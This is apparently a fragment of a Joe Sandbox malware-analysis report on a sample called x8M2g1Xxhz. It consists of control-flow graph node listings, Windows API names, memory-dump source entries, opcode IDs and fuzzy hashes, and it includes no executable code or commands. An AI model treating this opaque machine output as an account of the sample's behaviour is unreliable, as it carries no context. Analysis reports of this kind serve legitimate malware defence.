96265->96266 96267 85fc84b 96266->96267 96271 85fc910 96267->96271 96268 85fc873 GetCurrentThreadId 96269 85fc8a4 96268->96269 96272 85fc914 96271->96272 96273 85fc91e 96272->96273 96274 85fc99a DuplicateHandle 96272->96274 96273->96268 96275 85fca1e 96274->96275 96275->96268

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f call 40ad88 call 40ad82 0->6 12 401dc3-401ed4 CloseHandle call 401650 call 40b84d call 40af66 6->12 13 401c55-401c6c call 401650 6->13 52 401ed6-401eed call 40ba30 12->52 53 401eef 12->53 17 401c73-401c77 13->17 20 401c93-401c95 17->20 21 401c79-401c7b 17->21 22 401c98-401c9a 20->22 23 401c7d-401c83 21->23 24 401c8f-401c91 21->24 27 401cb0-401cce call 401650 22->27 28 401c9c-401caf 22->28 23->20 25 401c85-401c8d 23->25 24->22 25->17 25->24 33 401cd0-401cd4 27->33 35 401cf0-401cf2 33->35 36 401cd6-401cd8 33->36 37 401cf5-401cf7 35->37 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 37->28 40 401cf9-401d09 call 40ad7c 37->40 38->35 42 401ce2-401cea 38->42 39->37 40->12 47 401d0f 40->47 42->33 42->39 49 401d10-401d2e call 401650 47->49 58 401d30-401d34 49->58 54 401ef3-401f1a call 401300 52->54 53->54 70 401f1c-401f2f 54->70 71 401f5f-401f69 54->71 61 401d50-401d52 58->61 62 401d36-401d38 58->62 65 401d55-401d57 61->65 63 401d3a-401d40 62->63 64 401d4c-401d4e 62->64 63->61 67 401d42-401d4a 63->67 64->65 65->28 68 401d5d-401d7b call 401650 65->68 67->58 67->64 76 401d80-401d84 68->76 73 401f33-401f5d call 401560 70->73 74 401f73-401f75 71->74 75 401f6b-401f72 71->75 73->71 78 401f92-4021a4 call 40ba30 call 40b84d call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 74->78 79 401f77-401f8d call 401560 74->79 75->74 81 401da0-401da2 76->81 82 401d86-401d88 76->82 78->5 106 4021aa-4021c0 78->106 79->78 88 401da5-401da7 81->88 86 401d8a-401d90 82->86 87 401d9c-401d9e 82->87 86->81 89 401d92-401d9a 86->89 87->88 88->28 90 401dad-401dbd call 40ad7c 88->90 89->76 89->87 90->12 90->49 108 4021c6-4021ca 106->108 109 40246a-402470 106->109 108->109 112 4021d0-402217 call 4018f0 108->112 110 402472-402475 109->110 111 40247a-402480 109->111 110->111 111->5 113 402482-402487 111->113 117 40221d-40223d 112->117 118 40244f-40245f 112->118 113->5 117->118 123 402243-402251 117->123 118->109 119 402461-402467 call 40b6b5 118->119 119->109 123->118 125 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 123->125 133 4022c3-40232a call 4018d0 call 40b350 125->133 134 4022b9-4022be call 40ad90 125->134 144 402336-40234d call 4018d0 133->144 145 40232c-402331 call 40ad90 133->145 134->133 175 40234e call 45ed01d 144->175 176 40234e call 45ed006 144->176 145->144 149 402350-402352 150 402354-402355 149->150 151 40235b-402361 149->151 150->151 152 402363-402368 call 40ad90 151->152 153 40236d-402375 151->153 152->153 155 402377-402379 153->155 156 40237b 153->156 157 40237d-40238f call 4018d0 155->157 156->157 177 402390 call 45ed01d 157->177 178 402390 call 45ed006 157->178 160 402392-4023a2 162 4023a4-4023a9 call 40ad90 160->162 163 4023ae-4023b4 160->163 162->163 165 4023b6-4023b8 163->165 166 4023ba 163->166 167 4023bc-402417 VariantClear * 2 call 4019a0 165->167 166->167 169 40241c-40242c VariantClear 167->169 170 402436-402445 call 4019a0 169->170 171 40242e-402433 169->171 170->118 174 402447-40244c 170->174 171->170 174->118 175->149 176->149 177->160 178->160
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3792366029.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.3792335417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792522579.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792522579.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792566680.0000000000436000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792587566.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792608478.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792632976.0000000000444000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792754378.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792780192.00000000005A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792843360.00000000005B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792866015.00000000005B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792898640.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792898640.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792954136.00000000005C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792977182.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3792998531.00000000005C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793017539.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793041135.00000000005D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793060447.00000000005DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793083731.00000000005DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793102880.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793128931.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793147536.00000000005F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793169552.00000000005FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793191693.0000000000606000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793216344.000000000061D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793236834.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793262916.0000000000636000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793284193.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793317418.000000000064B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793338816.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793338816.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.3793407994.00000000006B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleInitialize_getenv_malloc_memset
                                                                                                                      • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                      • API String ID: 2812500916-2962942730
                                                                                                                      • Opcode ID: 41e0dc8f89c28fb6f13233674a34cd2531e13f1b3ef0abc8fa1dc6c0c2e2b413
                                                                                                                      • Instruction ID: aeacecfe31c8f640dd8b23b77b51b7465f341b5288a0a1cc3acf654df65e57da
                                                                                                                      • Opcode Fuzzy Hash: 41e0dc8f89c28fb6f13233674a34cd2531e13f1b3ef0abc8fa1dc6c0c2e2b413
                                                                                                                      • Instruction Fuzzy Hash: 6D62AB2100C3C19ED321DA388888A5FBFD55FA6328F480B5DF1E55B2E2C7799909C76B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801680368.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8300000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: N
                                                                                                                      • API String ID: 0-1130791706
                                                                                                                      • Opcode ID: c1e080a565e524ef9abfb00a6a1094c25750e2aacb98ea2cdcdee6bc512fd28b
                                                                                                                      • Instruction ID: 8ccdb6ac5d68c6c7360531454090abb1e3c45524883ab72962dbe0753125d5b7
                                                                                                                      • Opcode Fuzzy Hash: c1e080a565e524ef9abfb00a6a1094c25750e2aacb98ea2cdcdee6bc512fd28b
                                                                                                                      • Instruction Fuzzy Hash: 5673E531C1075A8EDB11EF68C854A99F7B1FF99300F51C69AE4587B261EB70AAC4CF41
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801680368.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8300000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: K
                                                                                                                      • API String ID: 0-856455061
                                                                                                                      • Opcode ID: 226168f86413faf1ab3d8805e5195c6af73b4c63ee63447acfb041e22ced2c66
                                                                                                                      • Instruction ID: 09e1828788bb05abe9e01bef4ab4196a37112cd90dc238bf3b140366f6ca3520
                                                                                                                      • Opcode Fuzzy Hash: 226168f86413faf1ab3d8805e5195c6af73b4c63ee63447acfb041e22ced2c66
                                                                                                                      • Instruction Fuzzy Hash: 8B33E234C147198EDB11EF68C894A9DF7B1FF99300F50C69AE4586B261EB70AAC5CF81
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801680368.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8300000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0aefd5b1be1576cfd773fb0567a63f79309e225645ea3733994cbf534688a0a0
                                                                                                                      • Instruction ID: eba2fea82521decfd56b9f87aad1fafac1273ba7627f20b6524596de8f38dae6
                                                                                                                      • Opcode Fuzzy Hash: 0aefd5b1be1576cfd773fb0567a63f79309e225645ea3733994cbf534688a0a0
                                                                                                                      • Instruction Fuzzy Hash: AC224C74E00218CFDB14DFA9D894B9DBBB2BF85301F1081A9D849AB396DB359D86CF50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 0-3372436214
                                                                                                                      • Opcode ID: fcf46e11cec4711b568b693d16dcf6fc3316507e345f171e8b4370744bfa20b9
                                                                                                                      • Instruction ID: 686e726c3a59a1547595f4631e71cb122f08d947676679bb95e3b9276ba431c0
                                                                                                                      • Opcode Fuzzy Hash: fcf46e11cec4711b568b693d16dcf6fc3316507e345f171e8b4370744bfa20b9
                                                                                                                      • Instruction Fuzzy Hash: 5E328070A002199FDB18CF69C954BAEBBB6FF89314F148569E445DB361EB31EC42CB90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801680368.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8300000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: K
                                                                                                                      • API String ID: 0-856455061
                                                                                                                      • Opcode ID: 46d2fd3fb35db36143d0401f53698da7dcf2223aaa0ceeab0d472edb11805b71
                                                                                                                      • Instruction ID: 089505e582ad30876b73460d307ac81b0406104c58a966bb609cdc5450680de7
                                                                                                                      • Opcode Fuzzy Hash: 46d2fd3fb35db36143d0401f53698da7dcf2223aaa0ceeab0d472edb11805b71
                                                                                                                      • Instruction Fuzzy Hash: B0B13574D056198BDB14DFA9C8947DDFBB2FF89300F10C2AAD4486B261EB74AA85CF40
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 0-3372436214
                                                                                                                      • Opcode ID: 2f9f10e178cc0e602c3d6f6dbe6a6057238cc7f864bb9017faee23f4b2b9f635
                                                                                                                      • Instruction ID: 83f8a49a45c1c3228e6e032774fb465a0d51aeecd33153d5e3262c07bf803222
                                                                                                                      • Opcode Fuzzy Hash: 2f9f10e178cc0e602c3d6f6dbe6a6057238cc7f864bb9017faee23f4b2b9f635
                                                                                                                      • Instruction Fuzzy Hash: 6A919474E00218DFDB24DFAAD984A9DBBF2FF89314F148069D409AB365EB34A941CF50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 0-3372436214
                                                                                                                      • Opcode ID: 5b5bfc10ed35df2ca0cc3a2879426a57422fcdbc2cc4d9f3987d0bdc1ced5e34
                                                                                                                      • Instruction ID: db1aa7c1ebf3816372966d2f729afee5741a28889dea9cde8f20afd87808991d
                                                                                                                      • Opcode Fuzzy Hash: 5b5bfc10ed35df2ca0cc3a2879426a57422fcdbc2cc4d9f3987d0bdc1ced5e34
                                                                                                                      • Instruction Fuzzy Hash: 8581B474E40218CFDB14DFAAD984A9DBBF2BF89310F14C069D819AB365EB30A945DF50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 0-3372436214
                                                                                                                      • Opcode ID: 9748a8449bc747899ce8c9cb6cd5b27d9685704978891e9a87c4d3161b88032d
                                                                                                                      • Instruction ID: 0b1b8cfd166e3e9a58bd460e14090b47a3b51623e7bbd62e6a74fa67a4f0dff7
                                                                                                                      • Opcode Fuzzy Hash: 9748a8449bc747899ce8c9cb6cd5b27d9685704978891e9a87c4d3161b88032d
                                                                                                                      • Instruction Fuzzy Hash: F281C374E40218CFEB15CFAAD984A9DBBF2BF89314F148069D809AB365DB30A941DF50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 0-3372436214
                                                                                                                      • Opcode ID: 601eda32a2a628b63567445c8054cf5b1396b6ea396b8b3ffb20bb5c53b1c0e2
                                                                                                                      • Instruction ID: 35cc75632c3c069d196f25d5a0d802836f9a4cbb0b83156b8b23ba0b9a9c4d2a
                                                                                                                      • Opcode Fuzzy Hash: 601eda32a2a628b63567445c8054cf5b1396b6ea396b8b3ffb20bb5c53b1c0e2
                                                                                                                      • Instruction Fuzzy Hash: B4819374E00218DFEB14DFAAD984A9DBBF2BF89310F14C069D819AB365DB74A941CF50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 0-3372436214
                                                                                                                      • Opcode ID: e4125cc631fb3b3e1b94285c7cbb87442e6931a57f07db6598bfdf485406563d
                                                                                                                      • Instruction ID: 3011de98070de91bfe1dcaf958a74023bdd08b427754ea4abf4f09318b82dca2
                                                                                                                      • Opcode Fuzzy Hash: e4125cc631fb3b3e1b94285c7cbb87442e6931a57f07db6598bfdf485406563d
                                                                                                                      • Instruction Fuzzy Hash: D961A474E00208DFEB18DFAAD984A9DBBF2BF89314F14C069D819AB365DB746841CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d84737d3c48a40b1a5a59cd8a14230481fd9868c43df716a3ab8b82e2caf8f1d
                                                                                                                      • Instruction ID: 73f06326f5279f0a3162e7dfb6235036d9f77be5861aa6665134526af9815ed5
                                                                                                                      • Opcode Fuzzy Hash: d84737d3c48a40b1a5a59cd8a14230481fd9868c43df716a3ab8b82e2caf8f1d
                                                                                                                      • Instruction Fuzzy Hash: 4882D3359002609BFF154F2D958C178FB75AB83734B95989DCCF4AB372D222F84A87A1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 247f41647ee5e40190e2ffad515b93f2a6ad41cf6a3a7769ebd94f0308ac44a2
                                                                                                                      • Instruction ID: ca7b07a4b6d3ba8b47707abed63de0272d52992d1563bd7071c5589e60172e35
                                                                                                                      • Opcode Fuzzy Hash: 247f41647ee5e40190e2ffad515b93f2a6ad41cf6a3a7769ebd94f0308ac44a2
                                                                                                                      • Instruction Fuzzy Hash: E5825D75A01209DFCB15CFA8C984AAEBBB6FF89310F158559E415AB361D730FD81CB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802046786.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_85f0000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9145f44db460bd1ab4e96bc1f6e17eca6ed05cb1fc3dca78f31c90431816a035
                                                                                                                      • Instruction ID: 495d82dbdf73e014ea0d96113cfef8f35851699abfae735168c402563738e6a7
                                                                                                                      • Opcode Fuzzy Hash: 9145f44db460bd1ab4e96bc1f6e17eca6ed05cb1fc3dca78f31c90431816a035
                                                                                                                      • Instruction Fuzzy Hash: 0782A674A11228CFDB64DF24D999BA9BBB2FF89305F1081E9D80967360CB316E81DF54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802046786.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_85f0000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 71eac33f095054d99ef15160150595979974d465faf6ba56582c316f21782925
                                                                                                                      • Instruction ID: 5b3756e164dd07a3cbc866939c47c715d55e8924d3e5433e47ecd2967dd76fce
                                                                                                                      • Opcode Fuzzy Hash: 71eac33f095054d99ef15160150595979974d465faf6ba56582c316f21782925
                                                                                                                      • Instruction Fuzzy Hash: 6B82A674A11228CFDB64DF24D999BA9BBB2FF89305F1081E9D80967360CB316E81DF54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801854824.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8570000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: eaa80c65c2370b52663ce29f6bad1cc98cd8d68f56736f213bfb3c1471441a05
                                                                                                                      • Instruction ID: 43153e89f9f26d1aa8f94783ae040c19dc727ca00da1e1af685de7b1d943511e
                                                                                                                      • Opcode Fuzzy Hash: eaa80c65c2370b52663ce29f6bad1cc98cd8d68f56736f213bfb3c1471441a05
                                                                                                                      • Instruction Fuzzy Hash: 75827F74E012688FEB64DF69D998BDDBBB2BB89301F1081E9940DA7260DB305E81DF54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801680368.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8300000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c20c4991519510a143c9814320ada3ea63e66f6f6b09bd7908b1c48313a53f8e
                                                                                                                      • Instruction ID: eb6a541728231ed541ee46a0cd78e95d067244ced08aff6028fa5120ae8f8125
                                                                                                                      • Opcode Fuzzy Hash: c20c4991519510a143c9814320ada3ea63e66f6f6b09bd7908b1c48313a53f8e
                                                                                                                      • Instruction Fuzzy Hash: 3572AE74E012288FDB64DF69C994BDDBBB2BB89301F1481EAD449A7391DB349E81CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802046786.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_85f0000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6fe46516584cd4817e74b0812efa011bf779e6a5cb4e23f87f718a3458a7bc9e
                                                                                                                      • Instruction ID: 48e6a59a74d809c87d8b6c440769a4043bd34d29de0011db0f20a5ebb4543f52
                                                                                                                      • Opcode Fuzzy Hash: 6fe46516584cd4817e74b0812efa011bf779e6a5cb4e23f87f718a3458a7bc9e
                                                                                                                      • Instruction Fuzzy Hash: D052B674A11219CFDB64DF24D999BADBBB2FB49305F1081E9E80967360CB31AE81CF54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802046786.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_85f0000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fffa7fbb26555fe0ce8ab3868ba103762c0ab136b9731faf11998dc6f37b9956
                                                                                                                      • Instruction ID: bc04350769928e0514eb732ec2b09cf3e0af74ae884f6ea8faef793531f214c3
                                                                                                                      • Opcode Fuzzy Hash: fffa7fbb26555fe0ce8ab3868ba103762c0ab136b9731faf11998dc6f37b9956
                                                                                                                      • Instruction Fuzzy Hash: 1512CA74A10219CFDB64DF24D999BA9BBB2FF49305F1081D9E4096B364CB31AE81CF54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 99c82cec5af89a17cef62afcfe07aab09d8aa09498806072f2e1dbee35c86328
                                                                                                                      • Instruction ID: 2672e550d15e3d034719c3b663fc27917a17bd89401f84f80bb74db2d9bcaf45
                                                                                                                      • Opcode Fuzzy Hash: 99c82cec5af89a17cef62afcfe07aab09d8aa09498806072f2e1dbee35c86328
                                                                                                                      • Instruction Fuzzy Hash: 0BF11974A00219DFDB19CFADD884AADBBB2FF89714F15806AE415AB371D730E941CB50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802283858.0000000008E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8e50000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6e7a6f61214dd62f807a601836f7b69c73d7a7583c461d676b47870718b09788
                                                                                                                      • Instruction ID: 1a354163d95f982a9d128c1ad40593e73e5f1f68e838c4f377d11a3455e11a5c
                                                                                                                      • Opcode Fuzzy Hash: 6e7a6f61214dd62f807a601836f7b69c73d7a7583c461d676b47870718b09788
                                                                                                                      • Instruction Fuzzy Hash: F7D1AA75A003099FCB14DF79C890AAEBBF1FF89215B04966DD80ADB351DB34E806CB95
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 963f173f2c2b2e31cef7ca919e3d66922cfb83ad3e069c0e5f7f3ee859de94c3
                                                                                                                      • Instruction ID: 882559944cc25c42cecbe1924c1b084c623e91425a197e07db451b02c3f3b9b5
                                                                                                                      • Opcode Fuzzy Hash: 963f173f2c2b2e31cef7ca919e3d66922cfb83ad3e069c0e5f7f3ee859de94c3
                                                                                                                      • Instruction Fuzzy Hash: CBE1FA75E40218DFDB15CFA9D988A9DBBB1BF89314F1580A9E819AB361DB30EC41CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801879706.0000000008580000.00000040.00000800.00020000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8580000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4ef471e0586dbb9c002c44fd447d848f5991e3e35ae7e6e269643d1a28bf0721
                                                                                                                      • Instruction ID: 8f0b3c0e2f175cb02e9c17a5dafeaa432753276c58f66ee1479219940d6a6817
